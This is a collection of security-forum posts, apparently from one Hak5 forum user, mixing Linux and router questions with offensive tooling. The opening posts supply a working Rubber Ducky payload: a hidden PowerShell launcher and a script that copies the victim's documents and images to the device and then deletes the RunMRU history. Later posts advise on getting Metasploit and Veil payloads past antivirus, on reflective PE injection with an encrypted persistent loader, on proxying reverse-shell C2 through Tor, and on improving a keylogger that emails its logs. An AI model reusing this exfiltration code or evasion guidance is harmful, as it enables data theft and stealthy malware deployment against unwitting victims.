PoSHMagiC0de

One line you do have to change is put in the name of the loot folder on the duck SSD. In the duckexfil file look for the $duckloot variable and it will have in quotes to enter the name of the folder to exfil to. It also assumes you have the scripts in a "payloads" folder right off the root of the ducky. If that is not the case, that folder name will need to be changed in the duckexfil also under the $payloaddir variable. I also mentioned I do not know what label twin duck gives itself when it mounts as storage so you will need to get that and change the 2 labels that have "-" in them to be the label twinduck gives. One is in the one line launcher and the other is in the duckexfil to get the duck drive. How it should work is the one liner launcher should launch powershell and get the drive the for the Twin duck, combine it with the "payloads\DuckExfil.ps1" file and use get-content encoding it all as string into memory and then outputting as one solid string rather than string array. (Posh 2.0 did not have the "-raw" switch for get-content to get files as is so it almost always return arrays that cannot be invoked as scripts so I pipe it to Out-String to make it a single string). Invokes that script which loads the function into memory. You then run the function that will build the paths in memory it needs to access the RD twinduck drive and perspective folders. You also build a list of file wildcards to get. With all that the script pulls in and invokes the smbexfil script which puts the function into memory and then it runs the function with parameters it needs. Now, if you wish to see it in action for testing, remove the "-w hidden" parameter from the launcher the window will not vanish. Good for testing to see if the script is running or quits immediately. I would also (for testing) monitor the duck folder to see if files are going there. Oh, the loot folder has to exist. Quick way to test is to just run the smbexfil script by itself on victim with RD plugged in with Storage available quacking nothing. You should see it and be able to hand run the script with parameters to copy maybe just text files to it. I do not have a RD anymore so unable to test with TD. Replaced with BashBunny so do not know how the TD does things but do not see why this is not working.

Man, been a busy week. Yeah, the script I recommended is to be used as almost a complete replacement to using CMD files. It takes inclusions as arrays and is completely powershell. What I meant by using it is on the RubberDucky you are limited to interactivity with your commands unlike the BB so with that script you will need to create a launcher script to keep the quack command small so it will be a two stager only so you can use the 1st stage as your config script. # This is DuckExfil.ps1 function Invoke-DuckExfil { $exfilfolder = "$env:userprofile\Documents\" $duckDrive = (gwmi -class win32_volume -f {label='-'}).Name $payloaddir = "payloads\" $duckpayloads = join-path $duckDrive $payloaddir $duckloot = join-path $duckdrive "loot folder on duck\" #Documents $docs = @("*.csv", "*.doc", "*.docx", "*.odt", "*.ods", "*.odg", "*.odp", "*.pdf", "*.pps", "*.txt", "*.tex", "*.ltx", "*.rtf", "*.xls", ".xlsx") #Images $img = @("*.gif", "*.jpg", "*.jpeg", "*.png", "*.tiff", "*.psd", "*.webp") #And other formats that I will not include because it is monotonous. #Combine into 1 arraylist $filetypes = [System.Collections.ArrayList]::new() $filetypes.Addrange($docs) $filetypes.Addrange($img) #Get the smbexfil script and run it with parameters. IEX (gc (join-path $duckpayloads "Invoke-SMBExfil.ps1") -encoding String | Out-String) Invoke-SMBExfil $exfilfolder $duckloot $filetypes $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') sleep -m 250 $wsh.SendKeys('{CAPSLOCK}') sleep -m 250 $wsh.SendKeys('{CAPSLOCK}') sleep -m 250 $wsh.SendKeys('{CAPSLOCK}') Remove-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU } And the quack command should be something like this: STRING powershell -NoP -W hidden -C {$duck=(join-path (gwmi -class win32_volume -f "label='-'").Name "payloads\DuckExfil.ps1");IEX (gc $duck -encoding String | Out-String);Invoke-DuckExfil} I do not know what the twin duck label is so where the labels are at is what the label the RB twinduck shows up as. With the the ducky commands to launch a cmd window done first and then the string command above you should get the window disappearing and files copying ending with that keyboard light sequence when done. Config of paths and stuff done in the DuckExfil.ps1 file. Just showing another option.

I do not have my Rubber Duck anymore but have a BashBunny and a script in Powershell for smbexfiltration. It can be located in my BBTPS project at the link below. You just need create a oneline stager to get the patch to the Rubber ducky and then get-content the script, invoke it and then run the function with the base path to the files, path to where the files are going on the rubber ducky and an array of extensions or filenames you want from that folder. Of course all the extensions you want will make the command longer unless you build a wrapper script for it that will pass it all the extensions or modify the script to invoke the command at the end of it with the parameters. https://github.com/PoSHMagiC0de/BBTPS/tree/master/jobs/totalp0wn Yeah, it is called smbexfil but will take any kind of path you give it. Only called it that because I pass it a UNC path in the project to exfil via the SMB path to BB.

So, this is a never ending adventure for me. Using dd in many different ways and the built in usb image writer in the Ubuntu like OSes I have tried to make bootable USBs from bootable ISO images. I would have to say it is hit and miss. The three methods I have tried are: 1) DD the whole disk with the image (/dev/sdb) 2) Create a partition on the USB stick and dding in there (/dev/sdb1) 3) Using the USB Stick reformatter and then USB image writer. Oh, I have also ran sync at the end of each to make sure the USB is synced before safely ejecting it. One of three above usually works but I have ran across some that do not work at all with the above methods. What I do know is if I jump on a Windows system and use Rufus portable it will always work. I mean it has never failed me. if the ISO is bootable, it will be bootable on the USB...always. Question, is there a 100% proven way to write a bootable ISO to a USB stick with Linux and have it be bootable? A good example of an ISO to try is Hiren's. That ISO would not bootup until I used Rufus to do it.

Simple explanation for this situation is this. Although the computers in the library are for public use, they are owned by the library. When they break, the library has to requisition public funds to get it fix. Either they have to call in a contractor or the city IT department has to fix it. So, it has private ownership even if it is a public service. I know somewhere around that machine there is a terms of service. So, it would be like if my neighbors gave me money (taxes in gov terms), I used that money to put in a drinking fountain in my front yard that everyone can use (open to the public). If it has plumbing issues and stuff, I will have to pay to fix it since I bought it and am the owner..even if the neighbors help by giving more money. Ultimately it will be in my name (library machines are property of the library or city). So, does that mean I am not going to call the police if I see one of the neighborhood kids pissing in it? Does public use mean he can piss in it? Pretty much when you try and compromise the library machine or do anything outside the intended use of the service, you are essentially pissing in it and if you are caught they will call the police on you. Now, I would be weary about doing illegal things on those machines too. They are property of the city, in extension the gov. That means that traffic can be monitored by any number of agencies and the library has cameras. Your agent calls out at a certain time, they have that timestamped and camera footage of you sitting at the machine. Now they only have to find you. Plus, the most you will probably get from the machine at great risk is folks browsing porn sites. :-P

Simple way to describe a reverse shell is the victim machine calls out to the attacker machine and passes it a command prompt (shell). Lookup netcat reverse shells. Now, as far as anonymous. Most malicious C&Cs which the shell maybe calling back to are on those bullet proof hosts. But if they are wanting to hide they would use a proxy, another server the shell calls to that will forward the traffic to the real server or through a chain of servers till it arrives at the real server. This could be a dynamic proxy where the payload has the proxy to use and the server to end at but of course then your real server IP will be in memory with the payload. The other is a static proxy where no matter what, if you talk to this server it will forward to the other server. Just keep in mind there is always a trail. The host company, if in a country where the hosts will work with law enforcement, will have records of the connections. Of course you could always have one of the proxies have tor so when the traffic comes in, it goes out via tor to your server running in tor. How to do all of that, as I know that question maybe coming next, you will have to research.

I am going to put this right here as I feel the exact same way on how I should be asked a question. I always get them like this. Incomplete and more of me figuring out what the question is just to find out that someone wants me to do all the work for them on something rather than asking a question. Stop sending me messages to do all the work for you. I will not reply. Now, here are my guidelines... :-P

Figured it out. I guess they did decide not to include the installer on the live preview part of the disk anymore. I had to install "debian-installer" and "debian-installer-launcher" to get the launcher to install from the Live preview boot. Doh.

So, i am redoing my laptop again. I am doing it by hand with 2 different linux distros. I am installing them on the same encrypted volume. I have done this dozen of times before but first time I am doing it with Kali. Issue, Kali live disk does not have an installer when booted in the live preview like other OSes does. It is supposed to but I think Rapid 7 thought it was a good idea to pull it out in their latest version for some reason. Anyone know how to get it back on the live CD or another way to launch it. Before answers roll in or questions check these out first. No, you cannot use the bootup installer on a disk already encrypted and I do not want to wipe it because it has one of my OSes installed in it already. No, you cannot use bootup installer unless you know a way to load cryptsetup so I can open up my encrypted volume which is why I need the installer in the live environment.

True but the support for the AC is sketchy. The one I posted is listed as tried and true. Liked it so much I decided to get one to use on the pi 3 as a second antennae. Should be here next week hehe. I already have a 2.4GHz Alpha that works great for 2.4GHz stuff.

And if you want dual band you can get one of these. https://www.amazon.com/dp/B01LY35HGO/ref=psdc_13983791_t3_B0035OCVO6

Will be hard as it is trial and error. You can try using the web_delivery agent and its Powershell stager to launch it. Try veil with Powershell and even Veil's cs meterpreter with ARYA. Might decrease detectability if you just grab the source it produces in csharp and compile it on a Windows machine using csc.exe. You might want to look up Obfuscation and try all the tricks they recommend. Also, try tunring off Avira's firewall only and see if your session connects.

I have not tried my luck against Avira yet. I usually go against Avast for detection. Question I have is does Avira have a firewall? Try to ping the attacker machine from the victim with Avira on and see if it talks to it. Put up a simple web page on attacker and see if you can browse to it with Avira on. If so, it maybe still seeing the payload in transit and stopping. Last question, are you running a staged payload or stageless. You know it is staged in Metasploit if it says something upon connection about sending stage 1, etc. Maybe stage is getting intercepted. So many things could be the issue and you may have to do some things by hand to see what is happening. Like I try hand grabbing payloads as plain text, compressed and even encrypted across the wire to see what gets through and see if it gets detected as I decrypt and\or uncompress and run. Since I do not use Avira, I cannot tell you where it might be dying. Maybe the Avira logs will tell you something? probably even running sysinternal process monitor to watch and see what fires off and stuff when the payload is launched. Compare to to how it looks when it launches without AV versus how it looks when launched with it. Last thing, I always test in a VM, not only for protection of machine but for rollbacks mainly to clear the AV. Avast remembers bad payloads or payloads that were good but now deemed bad because they launched something that was considered bad. Once a payload is seen by avast, locally it will remember so even when I obfuscate it, it is still detected sometimes. Snapshot rollback to before the payload was detected fixes that.

I would be the first to admit I ignore a ton of questions on here that resemble yours mainly because most of them are from skiddies who have just bought a product hoping it is a "hack-in-the-box" (I trademark that name because a sec company here where I stay actually made something that can be classified as such hehe), meaning they can just plug it in and it does it all for them without them learning. So, forgive some members if they quickly jump down your throat. I may be guilty of this time again too. With that said, I understand your frustration with the wifi nano. I too have issues with some payloads. I do not blame the product itself. It does work. I do say documentation on payload creation and even the authors documentation tends to think everyone had first hand knowledge of their module's construction but that is just developer glass box syndrome. I even suffer from this at times, take a look at the documentation for my BBTPS for the Bashbunny hehehe. I admit I need to improve it. I updated recently and actually put work in on using modules in it rather than using it or its pineap and using my laptop as the device to do all the MiTM stuff and had issues with PortalAuth and EvilPortal. I recently saw a post where someone had to ssh into bunny to add the sd card to the path statement. So, undocumented bugs and issues are another small issue I see. Of course I have little understanding of OpenWRT so this makes me working on payloads for the Pineapple and the PacketSquirrel a little more difficult too so I blame my knowledge as well since everyone else is running these payloads. Though, i did get the nano expecting my machine to do most of the work due to horse power. So, yeah. For the Nano, you might want to ask on their forum if you have issues with payloads first before bagging. There are a lot of post like that already and most of the people who do bag have been the skiddies. So, though I am on the same page as you, the Nano does have uses and modules do work. it is probably due to, like me, we are not that deep into the tech of the product to resolve the issues or some people on the Nano forums are keeping and not pinning common issues so they are seen before people post. I do put that back on the forum. Sorry, I have requested some pinned articles due to repeated questions and they have not been pinned and the repeat of the questions keep coming so the forum does deserve some of the flak.

Trying to figure out exactly what you are asking seeing you say you have an exe you are trying to make FUD and you do not understand Powersploit. If you have an exe you made yourself and trying to obfuscate it or something then question is do you have the source? Also, do you know its architecture too? Is it .NET and if so is it 32bit or 64bit, if it is unmanaged is it 32bit or 64bit? If you have the source then changing the code around to do the same thing could obfuscate it enough to not be seen but do not use online scanners. Go download a free one on a test machine and test it there. Avast is a good one to test against, though it is very good so..yeah. If you have no source but know its architecture then you have a choice. If it is .NET then you can load it reflectively with powershell. Powersploit's DLLInjection module shows this though is a little different with exes as you have to find the entry point and execute it. (if it takes parameters, you have to feed it the parameters as it wants them ie string[]..even if you have no parameters but exe can take some you need to give it those object types empty). If it is unmanaged. ReflectivePEInjection loading is what you will need where you can keep the exe from hitting the drive and load directly from memory. The process (even if it is yourself) has to match the architecture of the executable though. If it is 32bit, you will need to launch a 32bit version of Powershell instance, if it is 64bit then you will need to launch the 64bit version of Powershell to inject it right. The process you are injecting into must also have matching bit version. Persistence will be tougher if your exe is detectable. You will need to encrypt it to leave behind somewhere on the system. The actual loader will be the one that is fired off and it will grab the encrypted file, decrypt it in memory and inject. Be warned, unmanaged code injection is seen sometimes by Avast.

I have written a script that does this before. Remove-wmiobject does not work on it. I cannot tell you why. But this will. Get-WMIObject -Computer $computer -Class Win32_UserProfile | where {($_.LocalPath -eq $profile)} | foreach {$_.Delete()}

Add a "_" after the "$". Get-WMIObject -Class Win32_UserProfile | where {($_.LocalPath -eq 'C:\Users\JoeBloggs')}

You are trying to deauth while channel hopping. No workie. Your command for airodump-ng is not locking onto a particular AP nor is it locking onto a channel. If you want to deauth without airodump-ng running you will need to manually change your channel. sudo iwconfig mon0 channel <channel of ap> After that it should find it. If you are using airodump-ng then put in the bssid of the AP so it can lock onto it or even add the "-c" option and the channel number to lock it to a channel the AP is on and then it will find it. aireplay-ng does not have the ability to change its channel. It uses whatever channel the interface is currently on.

Sold Ducky and use a BB but not that much difference and I follow on the forums where ever I see Powershell. So, looking at this script it is going to send the same attachment over again every 30 seconds just it may get bigger each time? You may want to rename log file, if keylogger is not locking it, then send it and then remove that copy so it is different each time. Or if you do not want to send the file itself still rename but get-content the contents of the file as the body of the email and send. Just some ideas. :-)

I didn't know about the LEDE thing. Good to see I am was not the only one wondering about the version of OpenWRT on the devices and good to see the Hak5 team is already on it. Was just wondering because on the OpenWRT site things look outdated and gives signs of no more development which sparked the concern.

Just wondering. I never looked at any of the WRT distros until I found my old Linksys and said to myself, "Hmm, lets see if we can flash it with one of the open source firmwares." The first thing I thought about was OpenWRT so I checked it out. Did you know on their main site it has not been updated for a year? I also looked for instructions for my particular router and seen disturbing posts. Wifi not working with the firmware, this and that issues listed. Next to them all was the author saying not going to fix. In fact, not going to fix was on almost everything. This threw of flags making me think this distro is going the way of the DoDo. So, during my search for answers I found DD-WRT. Took a look at it and they have a image for my router that was put up that as soon as December 2017. I also read all good things about it. I have not flashed it yet but going to when I have time to work on that. So, question I have is, is there a reason some Hak5 products still utilize OpenWRT versus DD-WRT which seems to have development still happening in it this very day?

I just saw your project. Some other advice with executables is you should not include programs from other programs..like netcat.exe is part of nmap licensed to them. If you want your thing to be binary-less, look at Powercat. Nishang also as a script or two in there for netcat compatible reverse shells.

What he is doing with the asplaintext is when you convert a password to secure string when the pass is in plain text, you have to let it know that and force the conversion so to speak. I notice you are using the modules to check for open ssh or sftp. If you are looking at static ports you can do this in direct .NET but will need to clear and instantiate the socket class each time due to it being a disposable object. Would be better to make it a function and loop the function. function Invoke-Portscan { [Cmdletbinding()] Param( [Parameter(Mandatory=$true)] [string]$IP, [Parameter(Mandatory=$true)] [int]$Port ) $scanresult = $false $socket = new-object System.Net.Sockets.TcpClient if($socket.ConnectAsync($IP, $Port).Wait(1000)) { $scanresult = $true } $socket.Close() | Out-Null rv socket return $scanresult } The above code will scan a single port and return true or false depending on if it is open or not. It has a timeout of 1 sec. You could use to scan a target port and react off of it. Posh-SSH is cool but you use it you have to know what responses you expect back to react off of them..including prompt unless you are using regex to ignore the prompt part somehow.

Oh, you want to replicate the pineapple on pi? Check out Fruity-Wifi. It was built with the pi in mind.

Kali is an operating system. If you have never used Linux, you should not be looking at that distro of operating systems. Learn Linux first. Kali runs as root which means everything runs as admin. If you go surfing in that OS or download things willy nilly (you can be easily owned). Kali was built for advanced Linux users. Seeing you are trying to download it for WIndows 10 (which you cannot unless you run it as a virtual machine) you probably never used Linux so I would say start with Ubuntu, Fedora or CentOS and figure out how to get around and do things in those before trying to use a pentest OS.